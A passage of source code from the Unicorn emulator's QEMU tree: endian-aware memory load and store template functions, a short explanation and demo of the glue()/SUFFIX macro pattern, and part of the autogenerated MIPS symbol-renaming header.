            val = ldl_be_p(ptr);
            break;
        default:
            val = ldl_p(ptr);
            break;
        }
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
    return val;
}

uint32_t glue(address_space_ldl, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_NATIVE_ENDIAN);
}

uint32_t glue(address_space_ldl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_LITTLE_ENDIAN);
}

uint32_t glue(address_space_ldl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_BIG_ENDIAN);
}

/* warning: addr must be aligned */
static inline uint64_t glue(address_space_ldq_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result,
    enum device_endian endian)
{
    uint8_t *ptr;
    uint64_t val;
    MemoryRegion *mr;
    hwaddr l = 8;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, false, attrs);
    if (l < 8 || !memory_access_is_direct(mr, false)) {
        /* I/O case */
        r = memory_region_dispatch_read(uc, mr, addr1, &val,
                                        MO_64 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            val = ldq_le_p(ptr);
            break;
        case DEVICE_BIG_ENDIAN:
            val = ldq_be_p(ptr);
            break;
        default:
            val = ldq_p(ptr);
            break;
        }
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
    return val;
}

uint64_t glue(address_space_ldq, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_NATIVE_ENDIAN);
}

uint64_t glue(address_space_ldq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_LITTLE_ENDIAN);
}

uint64_t glue(address_space_ldq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                    DEVICE_BIG_ENDIAN);
}

uint32_t glue(address_space_ldub, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    uint8_t *ptr;
    uint64_t val;
    MemoryRegion *mr;
    hwaddr l = 1;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, false, attrs);
    if (!memory_access_is_direct(mr, false)) {
        /* I/O case */
        r = memory_region_dispatch_read(uc, mr, addr1, &val, MO_8, attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        val = ldub_p(ptr);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
    return val;
}

/* warning: addr must be aligned */
static inline uint32_t glue(address_space_lduw_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result,
    enum device_endian endian)
{
    uint8_t *ptr;
    uint64_t val;
    MemoryRegion *mr;
    hwaddr l = 2;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, false, attrs);
    if (l < 2 || !memory_access_is_direct(mr, false)) {
        /* I/O case */
        r = memory_region_dispatch_read(uc, mr, addr1, &val,
                                        MO_16 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            val = lduw_le_p(ptr);
            break;
        case DEVICE_BIG_ENDIAN:
            val = lduw_be_p(ptr);
            break;
        default:
            val = lduw_p(ptr);
            break;
        }
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
    return val;
}

uint32_t glue(address_space_lduw, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                     DEVICE_NATIVE_ENDIAN);
}

uint32_t glue(address_space_lduw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                     DEVICE_LITTLE_ENDIAN);
}

uint32_t glue(address_space_lduw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result,
                                                     DEVICE_BIG_ENDIAN);
}

/* warning: addr must be aligned. The ram page is not masked as dirty
   and the code inside is not invalidated. It is useful if the dirty
   bits are used to track modified PTEs */
void glue(address_space_stl_notdirty, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    uint8_t *ptr;
    MemoryRegion *mr;
    hwaddr l = 4;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, true, attrs);
    if (l < 4 || !memory_access_is_direct(mr, true)) {
        r = memory_region_dispatch_write(uc, mr, addr1, val, MO_32, attrs);
    } else {
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        stl_p(ptr, val);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
}

/* warning: addr must be aligned */
static inline void glue(address_space_stl_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs,
    MemTxResult *result, enum device_endian endian)
{
    uint8_t *ptr;
    MemoryRegion *mr;
    hwaddr l = 4;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, true, attrs);
    if (l < 4 || !memory_access_is_direct(mr, true)) {
        r = memory_region_dispatch_write(uc, mr, addr1, val,
                                         MO_32 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            stl_le_p(ptr, val);
            break;
        case DEVICE_BIG_ENDIAN:
            stl_be_p(ptr, val);
            break;
        default:
            stl_p(ptr, val);
            break;
        }
        invalidate_and_set_dirty(mr, addr1, 4);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
}

void glue(address_space_stl, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_NATIVE_ENDIAN);
}

void glue(address_space_stl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_LITTLE_ENDIAN);
}

void glue(address_space_stl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_BIG_ENDIAN);
}

void glue(address_space_stb, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    uint8_t *ptr;
    MemoryRegion *mr;
    hwaddr l = 1;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, true, attrs);
    if (!memory_access_is_direct(mr, true)) {
        r = memory_region_dispatch_write(uc, mr, addr1, val, MO_8, attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        stb_p(ptr, val);
        invalidate_and_set_dirty(mr, addr1, 1);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
}

/* warning: addr must be aligned */
static inline void glue(address_space_stw_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs,
    MemTxResult *result, enum device_endian endian)
{
    uint8_t *ptr;
    MemoryRegion *mr;
    hwaddr l = 2;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, true, attrs);
    if (l < 2 || !memory_access_is_direct(mr, true)) {
        r = memory_region_dispatch_write(uc, mr, addr1, val,
                                         MO_16 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            stw_le_p(ptr, val);
            break;
        case DEVICE_BIG_ENDIAN:
            stw_be_p(ptr, val);
            break;
        default:
            stw_p(ptr, val);
            break;
        }
        invalidate_and_set_dirty(mr, addr1, 2);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
}

void glue(address_space_stw, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_NATIVE_ENDIAN);
}

void glue(address_space_stw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_LITTLE_ENDIAN);
}

void glue(address_space_stw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_BIG_ENDIAN);
}

static void glue(address_space_stq_internal, SUFFIX)(struct uc_struct *uc,
    ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs,
    MemTxResult *result, enum device_endian endian)
{
    uint8_t *ptr;
    MemoryRegion *mr;
    hwaddr l = 8;
    hwaddr addr1;
    MemTxResult r;

    //RCU_READ_LOCK();
    mr = TRANSLATE(addr, &addr1, &l, true, attrs);
    if (l < 8 || !memory_access_is_direct(mr, true)) {
        r = memory_region_dispatch_write(uc, mr, addr1, val,
                                         MO_64 | devend_memop(endian), attrs);
    } else {
        /* RAM case */
        ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1);
        switch (endian) {
        case DEVICE_LITTLE_ENDIAN:
            stq_le_p(ptr, val);
            break;
        case DEVICE_BIG_ENDIAN:
            stq_be_p(ptr, val);
            break;
        default:
            stq_p(ptr, val);
            break;
        }
        invalidate_and_set_dirty(mr, addr1, 8);
        r = MEMTX_OK;
    }
    if (result) {
        *result = r;
    }
    //RCU_READ_UNLOCK();
}

void glue(address_space_stq, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_NATIVE_ENDIAN);
}

void glue(address_space_stq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_LITTLE_ENDIAN);
}

void glue(address_space_stq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL,
    hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result)
{
    glue(address_space_stq_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result,
                                             DEVICE_BIG_ENDIAN);
}

#undef ARG1_DECL
#undef ARG1
#undef SUFFIX
#undef TRANSLATE
#undef RCU_READ_LOCK
#undef RCU_READ_UNLOCK
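memory_ldst.inc.c is written as a template: it is compiled by being #included from a file that first defines SUFFIX, ARG1_DECL, ARG1, TRANSLATE and the RCU lock macros, which is why the file #undefs all of them at the end, and glue() pastes SUFFIX onto each function name to give every instantiation distinct symbols. The single-file sketch below illustrates that glue()/SUFFIX pattern; the token-pasting helpers mirror QEMU's, while load_u32 and the _cached suffix are made-up names for illustration:

/* glue_demo.c -- sketch of the glue()/SUFFIX template pattern.
 * In the real tree the "template body" lives in a separate .inc.c file
 * that is #included after SUFFIX etc. are defined; here it is inline. */
#include <stdio.h>

#define xglue(x, y) x ## y   /* token pasting, as in QEMU */
#define glue(x, y) xglue(x, y)

#define SUFFIX _cached       /* what the including file would set */

/* ---- this stands in for the .inc.c template body ---- */
unsigned glue(load_u32, SUFFIX)(const unsigned char *p)
{
    /* little-endian reassembly, standing in for the real load logic */
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((unsigned)p[3] << 24);
}

#undef SUFFIX                /* the template #undefs its parameters */

int main(void)
{
    const unsigned char buf[4] = { 0x78, 0x56, 0x34, 0x12 };
    /* The expanded name is load_u32_cached(). */
    printf("0x%x\n", load_u32_cached(buf));
    return 0;
}

Redefining SUFFIX (and the other parameter macros) and including the template again would emit a second, independently named copy of every function, which is how the same access logic serves multiple address-space flavors.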
unicorn-2.1.1/qemu/mips.h

/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_mips_H
#define UNICORN_AUTOGEN_mips_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _mips
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_mips #define reg_read reg_read_mips #define reg_write reg_write_mips #define uc_init uc_init_mips #define uc_add_inline_hook uc_add_inline_hook_mips #define uc_del_inline_hook uc_del_inline_hook_mips #define tb_invalidate_phys_range tb_invalidate_phys_range_mips #define use_idiv_instructions use_idiv_instructions_mips #define arm_arch arm_arch_mips #define tb_target_set_jmp_target tb_target_set_jmp_target_mips #define have_bmi1 have_bmi1_mips #define have_popcnt have_popcnt_mips #define have_avx1 have_avx1_mips #define have_avx2 have_avx2_mips #define have_isa have_isa_mips #define have_altivec have_altivec_mips #define have_vsx have_vsx_mips #define flush_icache_range flush_icache_range_mips #define s390_facilities s390_facilities_mips #define tcg_dump_op tcg_dump_op_mips #define tcg_dump_ops tcg_dump_ops_mips #define tcg_gen_and_i64 tcg_gen_and_i64_mips #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips #define tcg_gen_or_i64 tcg_gen_or_i64_mips #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips #define tcg_gen_st_i64 tcg_gen_st_i64_mips #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips #define cpu_icount_to_ns cpu_icount_to_ns_mips #define cpu_is_stopped cpu_is_stopped_mips #define cpu_get_ticks cpu_get_ticks_mips #define cpu_get_clock cpu_get_clock_mips #define cpu_resume cpu_resume_mips #define qemu_init_vcpu qemu_init_vcpu_mips #define cpu_stop_current cpu_stop_current_mips #define resume_all_vcpus resume_all_vcpus_mips #define vm_start vm_start_mips #define address_space_dispatch_compact address_space_dispatch_compact_mips #define flatview_translate flatview_translate_mips #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips #define qemu_get_cpu qemu_get_cpu_mips #define cpu_address_space_init cpu_address_space_init_mips #define cpu_get_address_space cpu_get_address_space_mips #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips #define cpu_exec_initfn cpu_exec_initfn_mips #define cpu_exec_realizefn cpu_exec_realizefn_mips #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips #define cpu_watchpoint_insert cpu_watchpoint_insert_mips #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips #define cpu_breakpoint_insert cpu_breakpoint_insert_mips #define cpu_breakpoint_remove cpu_breakpoint_remove_mips #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips #define cpu_abort cpu_abort_mips #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips #define flatview_add_to_dispatch flatview_add_to_dispatch_mips #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips #define qemu_ram_get_offset qemu_ram_get_offset_mips #define qemu_ram_get_used_length qemu_ram_get_used_length_mips #define qemu_ram_is_shared qemu_ram_is_shared_mips #define qemu_ram_pagesize
qemu_ram_pagesize_mips #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips #define qemu_ram_alloc qemu_ram_alloc_mips #define qemu_ram_free qemu_ram_free_mips #define qemu_map_ram_ptr qemu_map_ram_ptr_mips #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mips #define qemu_ram_block_from_host qemu_ram_block_from_host_mips #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips #define cpu_check_watchpoint cpu_check_watchpoint_mips #define iotlb_to_section iotlb_to_section_mips #define address_space_dispatch_new address_space_dispatch_new_mips #define address_space_dispatch_free address_space_dispatch_free_mips #define flatview_read_continue flatview_read_continue_mips #define address_space_read_full address_space_read_full_mips #define address_space_write address_space_write_mips #define address_space_rw address_space_rw_mips #define cpu_physical_memory_rw cpu_physical_memory_rw_mips #define address_space_write_rom address_space_write_rom_mips #define cpu_flush_icache_range cpu_flush_icache_range_mips #define cpu_exec_init_all cpu_exec_init_all_mips #define address_space_access_valid address_space_access_valid_mips #define address_space_map address_space_map_mips #define address_space_unmap address_space_unmap_mips #define cpu_physical_memory_map cpu_physical_memory_map_mips #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips #define cpu_memory_rw_debug cpu_memory_rw_debug_mips #define qemu_target_page_size qemu_target_page_size_mips #define qemu_target_page_bits qemu_target_page_bits_mips #define qemu_target_page_bits_min qemu_target_page_bits_min_mips #define target_words_bigendian target_words_bigendian_mips #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips #define ram_block_discard_range ram_block_discard_range_mips #define ramblock_is_pmem ramblock_is_pmem_mips #define page_size_init page_size_init_mips #define set_preferred_target_page_bits set_preferred_target_page_bits_mips #define finalize_target_page_bits finalize_target_page_bits_mips #define cpu_outb cpu_outb_mips #define cpu_outw cpu_outw_mips #define cpu_outl cpu_outl_mips #define cpu_inb cpu_inb_mips #define cpu_inw cpu_inw_mips #define cpu_inl cpu_inl_mips #define memory_map memory_map_mips #define memory_map_io memory_map_io_mips #define memory_map_ptr memory_map_ptr_mips #define memory_cow memory_cow_mips #define memory_unmap memory_unmap_mips #define memory_moveout memory_moveout_mips #define memory_movein memory_movein_mips #define memory_free memory_free_mips #define flatview_unref flatview_unref_mips #define address_space_get_flatview address_space_get_flatview_mips #define memory_region_transaction_begin memory_region_transaction_begin_mips #define memory_region_transaction_commit memory_region_transaction_commit_mips #define memory_region_init memory_region_init_mips #define memory_region_access_valid memory_region_access_valid_mips #define memory_region_dispatch_read memory_region_dispatch_read_mips #define memory_region_dispatch_write memory_region_dispatch_write_mips #define memory_region_init_io memory_region_init_io_mips #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips #define memory_region_size memory_region_size_mips #define memory_region_set_readonly memory_region_set_readonly_mips #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips #define memory_region_from_host memory_region_from_host_mips #define memory_region_get_ram_addr memory_region_get_ram_addr_mips #define memory_region_add_subregion 
memory_region_add_subregion_mips #define memory_region_del_subregion memory_region_del_subregion_mips #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips #define memory_region_find memory_region_find_mips #define memory_region_filter_subregions memory_region_filter_subregions_mips #define memory_listener_register memory_listener_register_mips #define memory_listener_unregister memory_listener_unregister_mips #define address_space_remove_listeners address_space_remove_listeners_mips #define address_space_init address_space_init_mips #define address_space_destroy address_space_destroy_mips #define memory_region_init_ram memory_region_init_ram_mips #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips #define find_memory_mapping find_memory_mapping_mips #define exec_inline_op exec_inline_op_mips #define floatx80_default_nan floatx80_default_nan_mips #define float_raise float_raise_mips #define float16_is_quiet_nan float16_is_quiet_nan_mips #define float16_is_signaling_nan float16_is_signaling_nan_mips #define float32_is_quiet_nan float32_is_quiet_nan_mips #define float32_is_signaling_nan float32_is_signaling_nan_mips #define float64_is_quiet_nan float64_is_quiet_nan_mips #define float64_is_signaling_nan float64_is_signaling_nan_mips #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips #define floatx80_silence_nan floatx80_silence_nan_mips #define propagateFloatx80NaN propagateFloatx80NaN_mips #define float128_is_quiet_nan float128_is_quiet_nan_mips #define float128_is_signaling_nan float128_is_signaling_nan_mips #define float128_silence_nan float128_silence_nan_mips #define float16_add float16_add_mips #define float16_sub float16_sub_mips #define float32_add float32_add_mips #define float32_sub float32_sub_mips #define float64_add float64_add_mips #define float64_sub float64_sub_mips #define float16_mul float16_mul_mips #define float32_mul float32_mul_mips #define float64_mul float64_mul_mips #define float16_muladd float16_muladd_mips #define float32_muladd float32_muladd_mips #define float64_muladd float64_muladd_mips #define float16_div float16_div_mips #define float32_div float32_div_mips #define float64_div float64_div_mips #define float16_to_float32 float16_to_float32_mips #define float16_to_float64 float16_to_float64_mips #define float32_to_float16 float32_to_float16_mips #define float32_to_float64 float32_to_float64_mips #define float64_to_float16 float64_to_float16_mips #define float64_to_float32 float64_to_float32_mips #define float16_round_to_int float16_round_to_int_mips #define float32_round_to_int float32_round_to_int_mips #define float64_round_to_int float64_round_to_int_mips #define float16_to_int16_scalbn float16_to_int16_scalbn_mips #define float16_to_int32_scalbn float16_to_int32_scalbn_mips #define float16_to_int64_scalbn float16_to_int64_scalbn_mips #define float32_to_int16_scalbn float32_to_int16_scalbn_mips #define float32_to_int32_scalbn float32_to_int32_scalbn_mips #define float32_to_int64_scalbn float32_to_int64_scalbn_mips #define float64_to_int16_scalbn float64_to_int16_scalbn_mips #define float64_to_int32_scalbn float64_to_int32_scalbn_mips #define float64_to_int64_scalbn float64_to_int64_scalbn_mips #define float16_to_int16 float16_to_int16_mips #define float16_to_int32 float16_to_int32_mips #define float16_to_int64 float16_to_int64_mips #define float32_to_int16 float32_to_int16_mips #define float32_to_int32 float32_to_int32_mips 
#define float32_to_int64 float32_to_int64_mips #define float64_to_int16 float64_to_int16_mips #define float64_to_int32 float64_to_int32_mips #define float64_to_int64 float64_to_int64_mips #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips #define float16_to_uint16 float16_to_uint16_mips #define float16_to_uint32 float16_to_uint32_mips #define float16_to_uint64 float16_to_uint64_mips #define float32_to_uint16 float32_to_uint16_mips #define float32_to_uint32 float32_to_uint32_mips #define float32_to_uint64 float32_to_uint64_mips #define float64_to_uint16 float64_to_uint16_mips #define float64_to_uint32 float64_to_uint32_mips #define float64_to_uint64 float64_to_uint64_mips #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips #define int64_to_float16_scalbn int64_to_float16_scalbn_mips #define int32_to_float16_scalbn int32_to_float16_scalbn_mips #define int16_to_float16_scalbn int16_to_float16_scalbn_mips #define int64_to_float16 int64_to_float16_mips #define int32_to_float16 int32_to_float16_mips #define int16_to_float16 int16_to_float16_mips #define int64_to_float32_scalbn int64_to_float32_scalbn_mips #define int32_to_float32_scalbn int32_to_float32_scalbn_mips #define int16_to_float32_scalbn int16_to_float32_scalbn_mips #define int64_to_float32 int64_to_float32_mips #define int32_to_float32 int32_to_float32_mips #define int16_to_float32 int16_to_float32_mips #define int64_to_float64_scalbn int64_to_float64_scalbn_mips #define int32_to_float64_scalbn int32_to_float64_scalbn_mips #define int16_to_float64_scalbn int16_to_float64_scalbn_mips #define int64_to_float64 int64_to_float64_mips #define int32_to_float64 int32_to_float64_mips #define int16_to_float64 int16_to_float64_mips #define 
uint64_to_float16_scalbn uint64_to_float16_scalbn_mips #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mips #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mips #define uint64_to_float16 uint64_to_float16_mips #define uint32_to_float16 uint32_to_float16_mips #define uint16_to_float16 uint16_to_float16_mips #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mips #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mips #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mips #define uint64_to_float32 uint64_to_float32_mips #define uint32_to_float32 uint32_to_float32_mips #define uint16_to_float32 uint16_to_float32_mips #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mips #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mips #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mips #define uint64_to_float64 uint64_to_float64_mips #define uint32_to_float64 uint32_to_float64_mips #define uint16_to_float64 uint16_to_float64_mips #define float16_min float16_min_mips #define float16_minnum float16_minnum_mips #define float16_minnummag float16_minnummag_mips #define float16_max float16_max_mips #define float16_maxnum float16_maxnum_mips #define float16_maxnummag float16_maxnummag_mips #define float32_min float32_min_mips #define float32_minnum float32_minnum_mips #define float32_minnummag float32_minnummag_mips #define float32_max float32_max_mips #define float32_maxnum float32_maxnum_mips #define float32_maxnummag float32_maxnummag_mips #define float64_min float64_min_mips #define float64_minnum float64_minnum_mips #define float64_minnummag float64_minnummag_mips #define float64_max float64_max_mips #define float64_maxnum float64_maxnum_mips #define float64_maxnummag float64_maxnummag_mips #define float16_compare float16_compare_mips #define float16_compare_quiet float16_compare_quiet_mips #define float32_compare float32_compare_mips #define float32_compare_quiet float32_compare_quiet_mips #define float64_compare float64_compare_mips #define float64_compare_quiet float64_compare_quiet_mips #define float16_scalbn float16_scalbn_mips #define float32_scalbn float32_scalbn_mips #define float64_scalbn float64_scalbn_mips #define float16_sqrt float16_sqrt_mips #define float32_sqrt float32_sqrt_mips #define float64_sqrt float64_sqrt_mips #define float16_default_nan float16_default_nan_mips #define float32_default_nan 